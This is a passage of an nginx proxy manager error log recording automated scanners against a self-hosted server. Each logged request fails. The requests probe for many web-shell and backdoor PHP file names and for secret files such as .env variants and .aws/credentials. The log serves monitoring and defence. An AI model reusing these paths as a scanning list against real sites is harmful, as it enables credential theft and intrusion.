HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:20 [error] 363#363: *241454 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //lv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/byp.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /byp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //galex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/pn.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /pn.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/class-t.api.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /class-t.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/bipas.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /bipas.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/ha.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ha.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:21 [error] 363#363: *241454 open() "/var/www/html/shoyo.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /shoyo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/wp-l0gin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-l0gin.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/blurbs18.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /blurbs18.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/radio.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /radio.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/wp-good.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-good.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/bless14.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /bless14.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/ws13.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ws13.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:22 [error] 363#363: *241454 open() "/var/www/html/.well-known/gecko-litespeed.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /.well-known/gecko-litespeed.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/wp-admin/maint/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/wp-content/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/wp-admin/setup-config.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/setup-config.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/Contrller.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /Contrller.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/wp-includes/ID3/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/ID3/about.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/.well-known/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /.well-known/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/wp-includes/customize/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/customize/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/web.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //web.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:23 [error] 363#363: *241454 open() "/var/www/html/wp-content/plugins/pwnd/as.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/pwnd/as.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/zwso.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /zwso.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/wp-trackback.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-trackback.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /autoload_classmap.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/xsec1.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /xsec1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/wp-includes/Requests/Text/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Requests/Text/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/lx.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /lx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/fw.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /fw.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/bless.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /bless.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:24 [error] 363#363: *241454 open() "/var/www/html/X7x.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /X7x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/class20.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /class20.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/lock360.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /lock360.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/themes.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /themes.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/gifclass4.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /gifclass4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/qqq.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /qqq.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/xvent.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /xvent.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/wp-aaa.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-aaa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:25 [error] 363#363: *241454 open() "/var/www/html/ut.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ut.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/class19.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /class19.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/wp-content/themes/too.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/too.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/0o0.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /0o0.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/efile.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /efile.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/mg.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /mg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/build.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /build.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/plss3.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /plss3.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/about3.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /about3.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:26 [error] 363#363: *241454 open() "/var/www/html/atomlib.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /atomlib.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/we.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /we.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET ///admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/usep.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /usep.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/nc4.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /nc4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/cccc.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /cccc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/locale.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /locale.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/t.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /t.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/bp.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /bp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/wp-admin/user/about.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/user/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:27 [error] 363#363: *241454 open() "/var/www/html/geck.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /geck.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:28 [error] 363#363: *241454 open() "/var/www/html/wpc.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wpc.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:28 [error] 363#363: *241454 open() "/var/www/html/yellow.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /yellow.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:28 [error] 363#363: *241454 open() "/var/www/html/a.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /a.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:28 [error] 363#363: *241454 open() "/var/www/html/thh.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /thh.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:28 [error] 363#363: *241454 open() "/var/www/html/inde.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /inde.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:28 [error] 363#363: *241454 open() "/var/www/html/gv.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /gv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:28 [error] 363#363: *241454 open() "/var/www/html/admins.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /admins.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:28 [error] 363#363: *241454 open() "/var/www/html/.wp-db.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /.wp-db.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/wp-configs.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-configs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/wp-content/wp-configs.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET //wp-content/wp-configs.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/wp-includes/rest-api/fields/index.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/rest-api/fields/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/main.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /main.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/a1.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /a1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/ff2.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /ff2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/dfre.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /dfre.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:29 [error] 363#363: *241454 open() "/var/www/html/class.1.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /class.1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:30 [error] 363#363: *241454 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:30 [error] 363#363: *241454 open() "/var/www/html/clawwww.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /clawwww.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:30 [error] 363#363: *241454 open() "/var/www/html/tox.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /tox.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:30 [error] 363#363: *241454 open() "/var/www/html/acacia.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /acacia.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:30 [error] 363#363: *241454 open() "/var/www/html/aa2.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /aa2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:07:30 [error] 363#363: *241454 open() "/var/www/html/gg.php" failed (2: No such file or directory), client: 172.190.142.176, server: localhost-nginx-proxy-manager, request: "GET /gg.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/17 07:18:26 [error] 363#363: *241457 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "92.249.249.197:80" +2026/01/17 07:24:09 [error] 363#363: *241461 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.150.194.49, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:21 [error] 364#364: *241485 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:21 [error] 364#364: *241486 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:21 [error] 364#364: *241487 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:21 [error] 364#364: *241488 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:22 [error] 364#364: *241489 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:22 [error] 364#364: *241490 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:22 [error] 364#364: *241492 open() "/var/www/html/docs/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /docs/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:22 [error] 364#364: *241493 open() "/var/www/html/old/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /old/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:22 [error] 364#364: *241494 open() "/var/www/html/.env.local" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.local HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:22 [error] 365#365: *241495 open() "/var/www/html/cms/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /cms/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:23 [error] 363#363: *242983 open() "/var/www/html/new/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /new/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:23 [error] 363#363: *242984 open() "/var/www/html/frontend/web/debug/default/view" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /frontend/web/debug/default/view HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:24 [error] 363#363: *242985 open() "/var/www/html/_static/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /_static/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:24 [error] 363#363: *242986 open() "/var/www/html/download/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /download/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:24 [error] 363#363: *242987 open() "/var/www/html/saas/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /saas/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:24 [error] 363#363: *242988 open() "/var/www/html/.env.json" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.json HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:24 [error] 363#363: *242989 "/var/www/html/infos/index.html" is not found (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /infos/ HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:24 [error] 363#363: *242990 open() "/var/www/html/apps/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /apps/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:24 [error] 363#363: *242991 open() "/var/www/html/templates/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /templates/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:24 [error] 363#363: *242992 open() "/var/www/html/system/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /system/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:25 [error] 364#364: *242993 open() "/var/www/html/stag/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /stag/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:25 [error] 364#364: *242994 open() "/var/www/html/public_html/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /public_html/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:25 [error] 364#364: *242995 open() "/var/www/html/.env.development" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.env.development HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:25 [error] 364#364: *242996 open() "/var/www/html/portal/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /portal/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:25 [error] 364#364: *242997 open() "/var/www/html/project/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /project/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:25 [error] 364#364: *242998 open() "/var/www/html/.aws/credentials" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /.aws/credentials HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:25 [error] 364#364: *242999 open() "/var/www/html/app/config/parameters.yml" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /app/config/parameters.yml HTTP/1.1", host: "92.249.249.197" +2026/01/17 09:01:25 [error] 364#364: *243000 open() "/var/www/html/exapi/.env" failed (2: No such file or directory), client: 78.153.140.177, server: localhost-nginx-proxy-manager, request: "GET /exapi/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:54 [error] 364#364: *244520 open() "/var/www/html/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:54 [error] 364#364: *244521 open() "/var/www/html/api/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /api/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:54 [error] 364#364: *244522 open() "/var/www/html/backend/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /backend/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:54 [error] 364#364: *244523 open() "/var/www/html/admin/.env" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /admin/.env HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:55 [error] 364#364: *244524 open() "/var/www/html/.env.example" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /.env.example HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:55 [error] 364#364: *244525 open() "/var/www/html/app_dev.php/_profiler/phpinfo" failed (2: No such file or directory), client: 78.153.140.179, server: localhost-nginx-proxy-manager, request: "GET /app_dev.php/_profiler/phpinfo HTTP/1.1", host: "92.249.249.197" +2026/01/17 10:40:56 [error] 364#364: *244527 open() "/var/www/html/getcfg.php" failed (2: No such file or directory), client: 78.153.140.179, server: 